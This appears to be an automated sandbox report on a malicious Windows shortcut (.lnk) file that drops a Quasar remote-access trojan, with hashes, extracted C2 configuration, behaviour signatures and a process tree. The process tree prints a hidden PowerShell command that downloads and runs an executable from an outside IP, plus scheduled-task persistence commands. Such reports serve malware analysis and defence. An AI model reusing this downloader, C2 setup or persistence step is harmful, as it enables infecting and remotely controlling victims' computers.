Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-11-2024 04:03
Static task
static1
Behavioral task
behavioral1
Sample
e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00.lnk
Resource
win7-20240903-en
General
-
Target
e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00.lnk
-
Size
2KB
-
MD5
04e779f16953e15b609dfab5be6ebd26
-
SHA1
d0e0b98da3f2ee3b0f8346d511436891380dd4f6
-
SHA256
e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00
-
SHA512
4e1967297fb67949b14b16fe8f1d8292360b94602e9da4871476bd7bba84c2cc013bc1b1cedff029c8b01b81f357657919cddcc030ad783a4e61a8db2e5b564b
Malware Config
Extracted
http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe
Extracted
quasar
1.3.0.0
VTROY
31.13.224.12:61512
31.13.224.13:61513
QSR_MUTEX_4Q2rJqiVyC7hohzbjx
-
encryption_key
7Vp2dMCHrMjJthQ2Elyy
-
install_name
downloads.exe
-
log_directory
Logs
-
reconnect_delay
5000
-
startup_key
cssrse.exe
-
subdirectory
downloadupdates
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3120-27-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 4 4852 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 8 IoCs
Processes:
ajtjewc.exeajtjewc.exeajtjewc.exeajtjewc.exedownloads.exedownloads.exedownloads.exedownloads.exepid Process 4480 ajtjewc.exe 3120 ajtjewc.exe 732 ajtjewc.exe 2100 ajtjewc.exe 3964 downloads.exe 4296 downloads.exe 3144 downloads.exe 3796 downloads.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ip-api.com -
Suspicious use of SetThreadContext 6 IoCs
Processes:
ajtjewc.exedownloads.exedescription pid Process procid_target PID 4480 set thread context of 3120 4480 ajtjewc.exe 90 PID 4480 set thread context of 732 4480 ajtjewc.exe 91 PID 4480 set thread context of 2100 4480 ajtjewc.exe 92 PID 3964 set thread context of 4296 3964 downloads.exe 97 PID 3964 set thread context of 3144 3964 downloads.exe 98 PID 3964 set thread context of 3796 3964 downloads.exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 2544 4296 WerFault.exe 97 -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
ajtjewc.exeschtasks.exedownloads.exedownloads.exeschtasks.exeajtjewc.exeajtjewc.exeajtjewc.exedownloads.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ajtjewc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloads.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid Process 4528 schtasks.exe 204 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 4852 powershell.exe 4852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeajtjewc.exeajtjewc.exedownloads.exedownloads.exedescription pid Process Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 4480 ajtjewc.exe Token: SeDebugPrivilege 3120 ajtjewc.exe Token: SeDebugPrivilege 3964 downloads.exe Token: SeDebugPrivilege 3144 downloads.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
cmd.exepowershell.exeajtjewc.exeajtjewc.exedownloads.exedownloads.exedescription pid Process procid_target PID 4476 wrote to memory of 4852 4476 cmd.exe 85 PID 4476 wrote to memory of 4852 4476 cmd.exe 85 PID 4852 wrote to memory of 4480 4852 powershell.exe 89 PID 4852 wrote to memory of 4480 4852 powershell.exe 89 PID 4852 wrote to memory of 4480 4852 powershell.exe 89 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 3120 4480 ajtjewc.exe 90 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 732 4480 ajtjewc.exe 91 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 4480 wrote to memory of 2100 4480 ajtjewc.exe 92 PID 3120 wrote to memory of 4528 3120 ajtjewc.exe 94 PID 3120 wrote to memory of 4528 3120 ajtjewc.exe 94 PID 3120 wrote to memory of 4528 3120 ajtjewc.exe 94 PID 3120 wrote to memory of 3964 3120 ajtjewc.exe 96 PID 3120 wrote to memory of 3964 3120 ajtjewc.exe 96 PID 3120 wrote to memory of 3964 3120 ajtjewc.exe 96 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 4296 3964 downloads.exe 97 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3144 3964 downloads.exe 98 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3964 wrote to memory of 3796 3964 downloads.exe 100 PID 3144 wrote to memory of 204 3144 downloads.exe 105 PID 3144 wrote to memory of 204 3144 downloads.exe 105 PID 3144 wrote to memory of 204 3144 downloads.exe 105
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\e29b86ad063e26d4f88cc123f784983f542357cf922f296813b615c3d0d80a00.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hIdDEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://45.149.241.169:5336/ghsjfsgfjsyhsfhzgbdfbgzgfb/yugygfyjsbdfoesrjfzbhffbserhbwdewbrtsnbdjkfbrhjgvghvhgvhgvhgvHfgcNchgfcnhchgchgcnGfcngcgdcngchcngch/jhbhfbjadhghjvgfcxhhfcjtgvkhdfskjdkbzhdfhmzdkydbfvhzdfjgvhzvg/tfvjtcfgchgcgcHcgcftjcgtygvgFtrdcjfcgkhvGcjfcxhfcjgVK/chfgcx.exe','ajtjewc.exe');./'ajtjewc.exe';(get-item 'ajtjewc.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exe"C:\Users\Admin\AppData\Local\Temp\ajtjewc.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exeC:\Users\Admin\AppData\Local\Temp\ajtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\ajtjewc.exe" /rl HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4528
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
PID:4296 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 807⤵
- Program crash
PID:2544
-
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cssrse.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe" /rl HIGHEST /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:204
-
-
-
C:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exeC:\Users\Admin\AppData\Roaming\downloadupdates\downloads.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exeC:\Users\Admin\AppData\Local\Temp\ajtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:732
-
-
C:\Users\Admin\AppData\Local\Temp\ajtjewc.exeC:\Users\Admin\AppData\Local\Temp\ajtjewc.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2100
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4296 -ip 42961⤵PID:4548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
522B
MD50f39d6b9afc039d81ff31f65cbf76826
SHA18356d04fe7bba2695d59b6caf5c59f58f3e1a6d8
SHA256ea16b63ffd431ebf658b903710b6b3a9b8a2eb6814eee3a53b707a342780315d
SHA5125bad54adb2e32717ef6275f49e2f101dd7e2011c9be14a32e5c29051e8a3f608cbd0b44ac4855ab21e790cb7a5d84c5f69de087074fd01b35259d34d07f5aaf9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
773KB
MD5ea087d683bf86b06b48b797d7ec7a4f0
SHA119c673fbb29b58c82eaa1b398d8b2c13d82024ad
SHA2561030615e0ef4b461b68d47bfd787236866c98d3b4598b8e5ef56941b73cc3a9c
SHA512ea78497907f7d7e5c49a30c130b6bb4ebdd529cf4a10f4b71b2987085a0dd4c4600de7ca376d25bd85bdea941b4516457c09b6114e3df40b24acfbaa83c2e64a